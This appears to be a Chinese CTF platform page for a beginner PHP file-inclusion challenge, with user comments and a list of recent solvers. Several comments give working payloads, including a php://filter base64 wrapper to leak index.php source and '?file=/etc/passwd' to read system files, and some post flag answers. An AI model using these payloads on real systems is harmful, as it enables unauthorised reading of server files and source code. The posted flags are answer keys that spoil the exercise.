文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 11658
提  示:
描  述:
flag{}
评论
xclay 2年前

flag{a48aed21035fc48b5003c3f615fad2b0}

回复 0

tardigrade 2年前

http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

嵌入式学的CTF 2年前

PHP伪协议详解https://blog.csdn.net/cosmoslin/article/details/120695429

回复 0

xiaoxiao972521 2年前

????直接/flag就出来了?

回复 3

iwindy 2年前

没意思,为啥3金币

回复 0

453137 2年前

flag{3f73582017c0a7d0a0d1c937fcb9ccda}

回复 0

gyc3153616052 2年前

flag{d2fc833912015ef20e29905ab607e995}

回复 0

llluyan 2年前

flag:flag{2773e5133de5c764209074ecd6cf2a3a}

回复 0

canxue11 2年前

payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag

回复 1

HuangYanQwQ 2年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 10

WriteUp

image
harry

2 金币

评分(11)

解题动态

SX9 攻破了该题 14小时前
Irene 攻破了该题 1天前
纯情内向小学生 攻破了该题 1天前
123^% 攻破了该题 1天前
ovdoes 攻破了该题 2天前
13097932959 攻破了该题 2天前
藕藕藕是木薯 攻破了该题 2天前
笨蛋奶妈 攻破了该题 2天前
XHtzl99 攻破了该题 2天前
Noctis 攻破了该题 2天前
Miki2 攻破了该题 2天前
汤圆儿安 攻破了该题 3天前
keduolim 攻破了该题 3天前
灵梦归希 攻破了该题 3天前
1163064874 攻破了该题 4天前
kl01 攻破了该题 4天前
1393385937 攻破了该题 4天前
BVzero 攻破了该题 4天前
19137537912 攻破了该题 5天前
llc123 攻破了该题 5天前
问题反馈